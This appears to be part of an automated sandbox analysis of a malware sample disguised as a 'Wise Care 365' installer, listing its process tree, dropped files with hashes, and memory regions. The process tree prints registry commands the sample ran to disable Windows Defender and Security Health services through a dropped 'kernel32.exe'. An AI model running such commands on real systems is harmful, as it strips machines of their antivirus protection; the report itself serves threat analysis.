  "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
-
C:\Windows\System32\Conhost.exe  2⤵
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\ProgramData\ConsoleApp\kernel32.exe  1⤵
  "C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe  2⤵
  "C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
-
C:\Windows\System32\reg.exe  1⤵
  "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
-
C:\ProgramData\ConsoleApp\kernel32.exe  1⤵
  "C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
- Executes dropped EXE
-
C:\Windows\System32\reg.exe  1⤵
  "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
-
C:\Windows\system32\DllHost.exe  1⤵
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe  1⤵
  C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
-
C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe  1⤵
  C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\ProgramData\ConsoleApp\7za.exe
Filesize 572KB
MD5 c3d309156b8e8cf1d158de5fab1c2b40
SHA1 58ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256 993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA512 2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
C:\ProgramData\ConsoleApp\ControlSet000.bat
Filesize 1KB
MD5 484c8df5d5bd9d82f4ac1861472cf519
SHA1 eddc0d20c81d9dba14ee0be32c7c5f563481e792
SHA256 f240f76de7e18fd3344eb7e5f4d6976a33a331ca12d0aff18032ef99bb3bf953
SHA512 6cf730eb19d4b80ce045c17b8e162448d65219be0f0e04ee02245af157ffe9cceb235c182800f44d9260cfa49c44b8e7a8c0a8d1db174a8dad75c33f60bad2b7
-
C:\ProgramData\ConsoleApp\ControlSet001.bat
Filesize 12KB
MD5 0488c70e96c520bbebbf0e2fed900acc
SHA1 e48b076ed4b85b607e719cb4b226382dd35efa03
SHA256 e3b1f1a7f0bf75d6c7c144843f84c209ba13813302db3bd625344d3ce9ae6052
SHA512 f96a804cc50a6fc3aa7da9c1949f7f1f88845f288b3b391d12e3649321b25b5a168ddc63f8ba8cd4886df488b302d9d16a0fcb0bebddd1437754e849749ef9d8
-
C:\ProgramData\ConsoleApp\ControlSet003.vbs
Filesize 6KB
MD5 09362984bedb41d6b8789abcd5dadfe6
SHA1 3e795b8470277026c8ba36911a1965cbf0d0323a
SHA256 dcca2bd778a84917e846b0e3d29df8c791dc27b225cde41277e466d5d9745162
SHA512 c9009b2495852eeec3b2894896826fd1d8759f4252283486a97b3463cca3bf4fef997714fd7915ec30c5318cf43d40185e22ea130e4423d34884cbc3f98b6c60
-
C:\ProgramData\ConsoleApp\hfile.bin
Filesize 2.1MB
MD5 706bb6fe5e28685d8065c7e31e588077
SHA1 2512551f704a26ddcc5490ec54ad8ca8e9a36f5e
SHA256 115925d3dffde9ce53d43897ac4c909df00d40177d3ed05384e890af099bd785
SHA512 f20e50816907270b63a6a16b13fdf0f9eab409c4d646bcef8cd2445c3410020df021d7fb68fa81702f167368ce03cd8519f1777f06fe2932658a6c768fcea833
-
C:\ProgramData\ConsoleApp\kernel32.exe
Filesize 764KB
MD5 408dd6ade80f2ebbc2e5470a1fb506f1
SHA1 e00293ce0eb534874efd615ae590cf6aa3858ba4
SHA256 4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71
SHA512 4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0
-
C:\ProgramData\ConsoleApp\main.bat
Filesize 236B
MD5 0ddc6dd98f86cff7e50c1621fd16b55a
SHA1 27e61b2bf7a367c491f25a3ef70df2ef0e38c36a
SHA256 b0a5f27817ebca5a17f75d625f1c73dc0d1c2499f1d155916d5a404013856df6
SHA512 07cb691bb23bb75c2c72c3e915b7af1f8b8c831f3d77e81c67f95c5d1ec7f754a7b823b9f1cdecd5cc511a4c34a6e8f0938eaad52f8d6451fee973ecfd2b9609
-
C:\ProgramData\Local\Microsoft\Windows\Telemetry\wlanext32.exe
Filesize 5.3MB
MD5 654cdcbcb0eb566c0871dc39ee7ef6c0
SHA1 53f5f2340f3c621a03ecf2910af7db59a943682c
SHA256 4159e2b4279685b57b9e13d3a58a2dbc933261fcf8116d5ac3b76485e843b411
SHA512 ca81062cf37bcd49149183d43129298b8fb2343ae5e038261d128207d8db2ec9a927b38b7e7a8b7c5058deadf00e8a411b6af0b7108391a5855048725af674a3
-
C:\Users\Admin\AppData\Local\Temp\is-8A70E.tmp\ISTask.dll
Filesize 66KB
MD5 86a1311d51c00b278cb7f27796ea442e
SHA1 ac08ac9d08f8f5380e2a9a65f4117862aa861a19
SHA256 e916bdf232744e00cbd8d608168a019c9f41a68a7e8390aa48cfb525276c483d
SHA512 129e4b8dd2665bcfc5e72b4585343c51127b5d027dbb0234291e7a197baeca1bab5ed074e65e5e8c969ee01f9f65cc52c9993037416de9bfff2f872e5aeba7ec
-
C:\Users\Admin\AppData\Local\Temp\is-8A70E.tmp\VclStylesInno.dll
Filesize 3.0MB
MD5 b0ca93ceb050a2feff0b19e65072bbb5
SHA1 7ebbbbe2d2acd8fd516f824338d254a33b69f08d
SHA256 0e93313f42084d804b9ac4be53d844e549cfcaf19e6f276a3b0f82f01b9b2246
SHA512 37242423e62af30179906660c6dbbadca3dc2ba9e562f84315a69f3114765bc08e88321632843dbd78ba1728f8d1ce54a4edfa3b96a9d13e540aee895ae2d8e2
-
C:\Users\Admin\AppData\Local\Temp\is-BKVH8.tmp\aad0024d7c30bf6fee7c90d90371ca14.tmp
Filesize 2.4MB
MD5 f098bb35dca6ae44a05c65aac7a5444b
SHA1 c5c50d740c1b8e9d8715fc3b2c8026156295a437
SHA256 8a0163353bdcc0882008990b0479c571c91adaca143af8c03da145b28b02e1fe
SHA512 71d8fc99a67bfc1e2b3635db6092d51d2ae9ec47f652aa10234770e878ab8bfaad69f7b971d54169363763df59ebb33143d161cd2a1cb60bc6fa2bbe6ba0227b
-
C:\Users\Admin\AppData\Local\Temp\is-HT95T.tmp\Wise Care 365 5.9.1.582.exe
Filesize 35.4MB
MD5 05fda662bb382c2c95b9318b2394b246
SHA1 69365314afb6102209a806e0e474d94e58207ec6
SHA256 1cdf90593f92f8de7a6a8b812756ff9359a0a9827f0843ef40e1983f17d6b8d2
SHA512 b8d792f5529672227b94c55a2e914b8bbc569d9ce70e5c17022a5568dc51febb4fb0a497009d4975f8dc7574989041edf093285d62c34f09d5d55da09869f312
-
C:\Users\Admin\AppData\Local\Temp\is-HT95T.tmp\_isetup\_iscrypt.dll
Filesize 2KB
MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63
-
C:\Users\Admin\AppData\Local\Temp\is-SF6LE.tmp\Wise Care 365 5.9.1.582.tmp
Filesize 911KB
MD5 9d7850e858c24db77b91b25adf93812f
SHA1 f0bb0a9074b38dad7492422247c0a316197d26b6
SHA256 c062235322d35c79cfde7aea5fd90e9589e5fbca738ed41ab66de382e1a1b2e8
SHA512 e08084f265913a71d55750b75bbb01d1c43baa68d57eb9d6bc4ed46076577536b10901c06b92c66a926e07e268593b69936050cfacb8ed8e62b8fad86444e8ec
-
memory/320-152-0x0000000000000000-mapping.dmp
-
memory/440-177-0x0000000000000000-mapping.dmp
-
memory/536-165-0x0000000000000000-mapping.dmp
-
memory/640-150-0x0000000000000000-mapping.dmp
-
memory/768-163-0x0000000000000000-mapping.dmp
-
memory/892-199-0x0000000000000000-mapping.dmp
-
memory/1000-159-0x0000000000000000-mapping.dmp
-
memory/1076-136-0x0000000000000000-mapping.dmp
-
memory/1084-188-0x0000000000000000-mapping.dmp
-
memory/1088-190-0x0000000000000000-mapping.dmp
-
memory/1104-204-0x0000000000000000-mapping.dmp
-
memory/1164-192-0x0000000000000000-mapping.dmp
-
memory/1172-208-0x0000000000000000-mapping.dmp
-
memory/1384-169-0x0000000000000000-mapping.dmp
-
memory/1392-196-0x0000000000000000-mapping.dmp
-
memory/1456-206-0x0000000000000000-mapping.dmp
-
memory/1664-183-0x0000000000000000-mapping.dmp
-
memory/1772-137-0x0000000000000000-mapping.dmp
-
memory/1784-201-0x0000000000000000-mapping.dmp
-
memory/1888-337-0x0000000000BE0000-0x0000000000D35000-memory.dmp
Filesize 1.3MB
-
memory/1888-341-0x0000000000BE0000-0x0000000000D35000-memory.dmp
Filesize 1.3MB
-
memory/1888-339-0x0000000000BE0000-0x0000000000D35000-memory.dmp
Filesize 1.3MB
-
memory/1896-157-0x0000000000000000-mapping.dmp
-
memory/1900-210-0x0000000000000000-mapping.dmp
-
memory/1992-162-0x0000000000000000-mapping.dmp
-
memory/2136-166-0x0000000000000000-mapping.dmp
-
memory/2212-333-0x00007FFC61070000-0x00007FFC61B31000-memory.dmp
Filesize 10.8MB
-
memory/2212-332-0x0000000000910000-0x0000000000932000-memory.dmp
Filesize 136KB
-
memory/2212-335-0x00007FFC61070000-0x00007FFC61B31000-memory.dmp
Filesize 10.8MB
-
memory/2236-334-0x0000000000BE0000-0x0000000000D35000-memory.dmp
Filesize 1.3MB
-
memory/2236-336-0x0000000000BE0000-0x0000000000D35000-memory.dmp
Filesize 1.3MB
-
memory/2236-331-0x0000000000BE0000-0x0000000000D35000-memory.dmp
Filesize 1.3MB
-
memory/2248-156-0x0000000000000000-mapping.dmp
-
memory/2268-213-0x0000000000000000-mapping.dmp
-
memory/2268-141-0x0000000000000000-mapping.dmp
-
memory/2304-185-0x0000000000000000-mapping.dmp
-
memory/2364-187-0x0000000000000000-mapping.dmp
-
memory/2476-330-0x00000000005E0000-0x00000000006C0000-memory.dmp
Filesize 896KB
-
memory/2628-212-0x0000000000000000-mapping.dmp
-
memory/2660-171-0x0000000000000000-mapping.dmp
-
memory/2800-207-0x0000000000000000-mapping.dmp
-
memory/2864-198-0x0000000000400000-0x00000000004C0000-memory.dmp
Filesize 768KB
-
memory/2864-130-0x0000000000400000-0x00000000004C0000-memory.dmp
Filesize 768KB
-
memory/2864-134-0x0000000000400000-0x00000000004C0000-memory.dmp
Filesize 768KB
-
memory/2944-132-0x0000000000000000-mapping.dmp
-
memory/2964-160-0x0000000000000000-mapping.dmp
-
memory/2968-184-0x0000000000000000-mapping.dmp
-
memory/3196-172-0x0000000000000000-mapping.dmp
-
memory/3216-186-0x0000000000000000-mapping.dmp
-
memory/3276-195-0x0000000000000000-mapping.dmp
-
memory/3336-167-0x0000000000000000-mapping.dmp
-
memory/3364-164-0x0000000000000000-mapping.dmp
-
memory/3432-178-0x0000000000000000-mapping.dmp
-
memory/3436-216-0x0000000000400000-0x0000000000417000-memory.dmpFilesize
92KB
-
memory/3436-316-0x0000000000400000-0x0000000000417000-memory.dmpFilesize
92KB
-
memory/3436-221-0x0000000000400000-0x0000000000417000-memory.dmpFilesize
92KB
-
memory/3600-211-0x0000000000000000-mapping.dmp
-
memory/3708-193-0x0000000000000000-mapping.dmp
-
memory/3772-144-0x0000000004F90000-0x0000000004FB2000-memory.dmpFilesize
136KB
-
memory/3772-149-0x0000000006450000-0x000000000646A000-memory.dmpFilesize
104KB
-
memory/3772-145-0x00000000057C0000-0x0000000005826000-memory.dmpFilesize
408KB
-
memory/3772-140-0x0000000000000000-mapping.dmp
-
memory/3772-147-0x0000000005F40000-0x0000000005F5E000-memory.dmpFilesize
120KB
-
memory/3772-143-0x0000000005120000-0x0000000005748000-memory.dmpFilesize
6.2MB
-
memory/3772-148-0x0000000007580000-0x0000000007BFA000-memory.dmpFilesize
6.5MB
-
memory/3772-146-0x0000000005920000-0x0000000005986000-memory.dmpFilesize
408KB
-
memory/3772-142-0x0000000002960000-0x0000000002996000-memory.dmpFilesize
216KB
-
memory/3900-194-0x0000000000000000-mapping.dmp
-
memory/3980-317-0x0000000000560000-0x00000000005C0000-memory.dmpFilesize
384KB
-
memory/3988-214-0x0000000000000000-mapping.dmp
-
memory/4000-203-0x0000000000000000-mapping.dmp
-
memory/4148-170-0x0000000000000000-mapping.dmp
-
memory/4176-179-0x0000000000000000-mapping.dmp
-
memory/4200-180-0x0000000000000000-mapping.dmp
-
memory/4208-191-0x0000000000000000-mapping.dmp
-
memory/4320-197-0x0000000000000000-mapping.dmp
-
memory/4340-182-0x0000000000000000-mapping.dmp
-
memory/4368-340-0x0000000000BE0000-0x0000000000D35000-memory.dmpFilesize
1.3MB
-
memory/4368-338-0x0000000000BE0000-0x0000000000D35000-memory.dmpFilesize
1.3MB
-
memory/4548-181-0x0000000000000000-mapping.dmp
-
memory/4640-189-0x0000000000000000-mapping.dmp
-
memory/4728-176-0x0000000000000000-mapping.dmp
-
memory/4780-266-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-249-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-296-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-298-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-299-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-301-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-294-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-272-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-269-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-245-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-282-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-309-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-246-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-244-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-263-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-300-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-283-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-291-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-175-0x0000000000000000-mapping.dmp
-
memory/4780-287-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-247-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-281-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-277-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-276-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-242-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-271-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-268-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-279-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-264-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-261-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-252-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-297-0x0000000007331000-0x00000000075BF000-memory.dmpFilesize
2.6MB
-
memory/4780-241-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-228-0x0000000007100000-0x0000000007116000-memory.dmpFilesize
88KB
-
memory/4780-234-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-240-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-259-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-235-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-237-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-238-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-250-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-239-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-254-0x0000000007650000-0x0000000007790000-memory.dmpFilesize
1.2MB
-
memory/4780-233-0x0000000007330000-0x000000000764A000-memory.dmpFilesize
3.1MB
-
memory/4824-168-0x0000000000000000-mapping.dmp
-
memory/4828-161-0x0000000000000000-mapping.dmp
-
memory/4856-173-0x0000000000000000-mapping.dmp
-
memory/4876-200-0x0000000000000000-mapping.dmp
-
memory/4912-209-0x0000000000000000-mapping.dmp
-
memory/4976-320-0x0000000005D50000-0x0000000006368000-memory.dmpFilesize
6.1MB
-
memory/4976-318-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4976-329-0x0000000008870000-0x0000000008D9C000-memory.dmpFilesize
5.2MB
-
memory/4976-327-0x0000000005CF0000-0x0000000005D0E000-memory.dmpFilesize
120KB
-
memory/4976-321-0x0000000005750000-0x0000000005762000-memory.dmpFilesize
72KB
-
memory/4976-322-0x0000000005880000-0x000000000598A000-memory.dmpFilesize
1.0MB
-
memory/4976-319-0x0000000000B80000-0x0000000000BA0000-memory.dmpFilesize
128KB
-
memory/4976-328-0x0000000008170000-0x0000000008332000-memory.dmpFilesize
1.8MB
-
memory/4976-326-0x0000000006920000-0x0000000006EC4000-memory.dmpFilesize
5.6MB
-
memory/4976-325-0x0000000005C10000-0x0000000005CA2000-memory.dmpFilesize
584KB
-
memory/4976-323-0x00000000057B0000-0x00000000057EC000-memory.dmpFilesize
240KB
-
memory/4976-324-0x0000000005AF0000-0x0000000005B66000-memory.dmpFilesize
472KB
-
memory/5016-205-0x0000000000000000-mapping.dmp
-
memory/5024-174-0x0000000000000000-mapping.dmp
-
memory/5080-202-0x0000000000000000-mapping.dmp